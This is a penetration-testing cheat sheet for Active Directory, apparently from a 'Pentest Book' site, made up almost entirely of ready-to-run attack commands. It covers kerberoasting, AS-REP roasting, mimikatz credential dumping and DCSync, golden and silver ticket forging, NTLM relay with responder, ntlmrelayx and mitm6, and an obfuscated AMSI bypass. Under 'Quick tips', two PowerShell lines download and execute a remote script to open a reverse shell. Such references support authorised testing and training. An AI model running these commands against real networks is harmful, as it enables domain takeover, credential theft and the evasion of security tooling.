Pentest Book
Search…
AD

Info

Basic Active Directory terms

Users

Agent represented by a user account.
  • Regular user accounts (used by employees or for specific task as backups)
  • Computer accounts (ends with $). Computers in AD are a users subclass.

Services

  • Identified by SPN which indicates the service name and class, the owner and the host computer.
  • Is executed in a computer (the host of the service) as a process.
  • Services (as any process) are running in the context of a user account, with the privileges and permissions of that user.
  • The SPN’s of the services owned by an user are stored in the attribute ServicePrincipalName of that account.
  • Usually Domain Admin or similar role is required to modify the SPN’s of a user.

General

1
# Anonymous Credential LDAP Dumping:
2
ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)
3
4
# Impacket GetADUsers.py (Must have valid credentials)
5
GetADUsers.py -all -dc-ip
6
7
# Impacket lookupsid.py
8
/usr/share/doc/python3-impacket/examples/lookupsid.py username:[email protected]
9
10
# Windapsearch:
11
# https://github.com/ropnop/windapsearch
12
python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
13
# Go version https://github.com/ropnop/go-windapsearch
14
15
# CME
16
cme smb IP -u '' -p '' --users --shares
17
18
# BloodHound
19
# https://github.com/BloodHoundAD/BloodHound/releases
20
# https://github.com/BloodHoundAD/SharpHound3
21
# https://github.com/chryzsh/DarthSidious/blob/master/enumeration/bloodhound.md
22
Import-Module .\sharphound.ps1
23
. .\SharpHound.ps1
24
Invoke-BloodHound -CollectionMethod All
25
Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
26
# Bloodhound.py (no shell needed) remote, ldap auth
27
https://github.com/fox-it/BloodHound.py
28
bloodhound-python -u <user> -p '<password>' -ns <dc.ip> -d <domain.name> -c all
29
# BloodHound Cheatsheet
30
# https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
31
# Bloodhound complements
32
# https://github.com/RastreatorTeam/rastreator
33
34
# Rubeus
35
# https://github.com/GhostPack/Rubeus
36
## ASREProasting:
37
Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
38
## Kerberoasting:
39
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
40
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
41
## Pass the key (PTK):
42
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
43
# Using the ticket on a Windows target:
44
Rubeus.exe ptt /ticket:<ticket_kirbi_file>
45
46
# Password Spraying tool
47
https://github.com/dafthack/DomainPasswordSpray
48
49
# Kerberoast
50
https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
51
52
# Powerview
53
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
54
Find-InterestingDomainShareFile
55
–CheckAccess
56
57
# AD Cheatsheets
58
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
59
60
# References:
61
https://wadcoms.github.io/
62
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
63
https://github.com/infosecn1nja/AD-Attack-Defense
64
https://adsecurity.org/?page_id=1821
65
https://github.com/sense-of-security/ADRecon
66
https://adsecurity.org/?p=15
67
https://adsecurity.org/?cat=7
68
https://adsecurity.org/?page_id=4031
69
https://www.fuzzysecurity.com/tutorials/16.html
70
https://blog.stealthbits.com/complete-domain-compromise-with-golden-tickets/
71
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
72
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain
73
https://adsecurity.org/?p=1588
74
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
75
https://www.harmj0y.net/blog/tag/powerview/
76
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
77
https://github.com/dievus/Oh365UserFinder
78
https://o365blog.com/aadinternals/
Copied!

Common vulns

1
# Users having rights to add computers to domain
2
add-computer –domainname org.local -Credential ORG\john -restart –force
3
4
# AdminCount attribute set on common users
5
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
6
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
7
Import-Module ActiveDirectory
8
Get-AdObject -ldapfilter "(admincount=1)" -properties admincount
9
10
# High number of users in privileged groups
11
net group "Schema Admins" /domain
12
net group "Domain Admins" /domain
13
net group "Enterprise Admins" /domain
14
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
15
- Linux:
16
net rpc group members 'Schema Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
17
net rpc group members 'Domain Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
18
net rpc group members 'Enterprise Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
19
net rpc group members 'Domain Admins' -I 10.10.30.52 -U "john"%"pass123"
20
21
# Service accounts being members of Domain Admins
22
net group "Schema Admins" /domain
23
net group "Domain Admins" /domain
24
net group "Enterprise Admins" /domain
25
26
# Excessive privileges allowing for shadow Domain Admins
27
Bloodhound/Sharphound
28
29
# Service accounts vulnerable to Kerberoasting
30
GetUserSPNs.py -request example.com/john:pass123
31
hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt
32
33
# Users with non-expiring passwords
34
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
35
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
36
- PS
37
Import-Module ActiveDirectory
38
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }
39
40
# Users with password not required
41
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
42
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
43
- PS
44
Import-Module ActiveDirectory
45
Get-ADUser -Filter {UserAccountControl -band 0x0020}
46
47
# Storing passwords using reversible encryption
48
mimikatz # lsadump::dcsync /domain:example.com /user:poorjohn
49
50
# Storing passwords using LM hashes
51
- In NTDS.dit
52
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt
53
54
# Service accounts vulnerable to AS-REP roasting
55
GetNPUsers.py example.com/ -usersfile userlist.txt -format hashcat -no-pass
56
GetNPUsers.py example.com/john:pass123 -request -format hashcat
57
hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt
58
- PS
59
Import-Module ActiveDirectory
60
Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
61
62
# Weak domain password policy
63
net accounts /domain
64
polenum --username john --password pass123 --domain 10.10.51.11
65
enum4linux -P -u john -p pass123 -w dom.local 172.21.1.60
66
67
# Inactive domain accounts
68
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
69
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'
70
71
# Privileged users with password reset overdue
72
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
73
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt
74
75
while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
76
grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'
77
78
# Users with a weak password
79
$a = [adsisearcher](&(objectCategory=person)(objectClass=user))
80
$a.PropertiesToLoad.add(“samaccountname”) | out-null
81
$a.PageSize = 1
82
$a.FindAll() | % { echo $_.properties.samaccountname } > users.txt
83
84
Import-Module ./adlogin.ps1
85
adlogin users.txt domain.com password123
86
87
# Credentials in SYSVOL and Group Policy Preferences (GPP)
88
findstr /s /n /i /p password \\example.com\sysvol\example.com\*
89
mount.cifs -o domain=example.com,username=john,password="[email protected]" //10.10.139.115/SYSVOL /mnt
90
grep -ir 'password' /mnt
Copied!

Quick tips

1
# Amsi bypass
2
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
3
4
# Powershell Execution policy Bypass
5
powershell -ep bypass
6
7
# To input the output of the first command into second command use this powershell technique
8
# %{} is an alias for ForEach-Object{}
9
# ?{} is an alias for Where-Object{}
10
# $_ is variable
11
<First command> | %{<Second command> -<argument> $_}
12
13
# To filter out an object type we can use this technique with pipe.
14
?{$_.<object> -eq '<value>’'}
15
16
# Find local admin access
17
Find-LocalAdminAccess
18
19
# Get Domain sid
20
Get-DomainSID
21
Arguments -Domain “domain name”
22
23
# Get DC
24
Get-NetDomainController
25
Arguments -Domain “domain name”
26
27
# Get users in current domain
28
Get-NetUser
29
Arguments -UserName “username”
30
31
# Get user properties
32
Get-UserProperty
33
Arguments -Properties pwdlastset
34
35
# Search for a particular string in a user's attributes
36
Find-UserField -SearchField Description -SearchTerm ”built”
37
38
# Get all computers
39
Get-NetComputer -FullData
40
Many arguments -OperatingSystem -Ping -FullData
41
42
# Get groups
43
Get-NetGroup
44
Arguments -FullData -Domain
45
46
# Get members of a particular group
47
Get-NetGroupMember -GroupName "Domain Admins"
48
49
# Group Policies
50
Get-NetGPO Get-NetGPO -ComputerName Get-NetGPOGroup
51
52
# Get users that are part of a Machine's local Admin group
53
Find-GPOComputerAdmin -ComputerName
54
55
# Get OUs
56
Get-NetOU -FullData Get-NetGPO -GPOname
57
58
# Mapping forest
59
Get-NetForest -Verbose
60
Get-NetForestDomain -Verbose
61
62
# Mapping trust
63
Get-NetDomainTrust
64
Arguments -Domain
65
Get-NetForestDomain -Verbose | Get-NetDomainTrust
66
67
# Finding Constrained Delegation
68
Get-DomainUser -TrustedToAuth (Poweview Dev.)
69
70
# Finding UnConstrained Delegation
71
Get-NetComputer -UnConstrained
72
73
# Get ACLs
74
Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
75
76
# Search for interesting ACEs
77
Invoke-ACLScanner -ResolveGUIDs
78
79
# Reverse Shell
80
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.113/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443
81
powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.113 -Port 443
82
83
#Mimikatz
84
# Make ntlm ps-session
85
Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"'
86
87
# Dump creds
88
Invoke-Mimikatz
89
Invoke-Mimikatz -Command ‘“lsadump::lsa /patch”’
90
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"'
91
(dcsync requires 3 permission )
92
93
# Tickets
94
Inject ticket:-
95
Invoke-Mimikatz -Command '"kerberos::ptt <location of .kirbi tkt>"'
96
Export Tickets:-
97
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
98
99
# Golden tkt
100
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<krbtgt hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
101
102
# Silver tkt
103
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<target> /service:<ServiceType> /rc4:<rc4 NTLM Hash of user> /user:<UserToImpersonate> /ptt"'
104
105
# TGT tkt
106
kekeo.exe tgt::ask /user:<user name> /domain:<domain name> /rc4:<rc4 NTLM Hash of user>
107
108
# TGS tkt
109
Kekeo.exe
110
tgs::s4u /tgt:tgt_ticket.kirbi /user:<user>@<domain> /service:<service name>/<server name>
Copied!

Relay attacks flow

I’m bringing relaying back: A comprehensive guide on relaying anno 2022 - TrustedSec
TrustedSec

Scan

1
# First just listen
2
sudo responder -I eth0 -A
3
4
# Check SMB signing disabled
5
crackmapexec smb 10.10.10.0/24 --gen-relay-list smb_sign_disabled.txt
Copied!

Basic attack A

1
# Modify responder.cfg to disable HTTP and SMB servers
2
# Start ntmlrelay.py against smb_sign_disabled.txt hosts list
3
ntlmrelayx.py -tf smb_sign_disabled.txt
4
# Then start responder in attack mode
5
responder -rdP -I eth0
6
7
# Cracking NTLMv2
8
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force
Copied!

Basic attack B (socks proxy)

1
# Modify responder.cfg to disable HTTP and SMB servers
2
# Start ntmlrelay.py against smb_sign_disabled.txt hosts list
3
ntlmrelayx.py -tf smb_sign_disabled.txt -smb2support -socks
4
# Edit proxychains4.conf to:
5
socks4 127.0.0.1 1080
6
# Run secretsdump
7
proxychains secretsdump.py dcname\user:[email protected]
8
# Even smbclient
9
proxychains smbclient.py dcname\user:[email protected]
Copied!

LDAP Enum

1
ntlmrelayx.py -t ldap://10.10.10.10 -smb2support
Copied!

IPv6 DNS Takeover via Mitm6

1
git clone https://github.com/fox-it/mitm6.git
2
pip install mitm6
3
mitm6 -d domain.name
4
# During before step, in other terminal run
5
ntlmrelayx.py -6 -t ldaps://192.168.176.129 -wh fakewpadhost.domain.name -l dir
Copied!

AD Mindmap

https://t.co/hE0VKO5b2I?amp=1
Pentesting_Active_directory
https://xmind.net/m/5dypm8/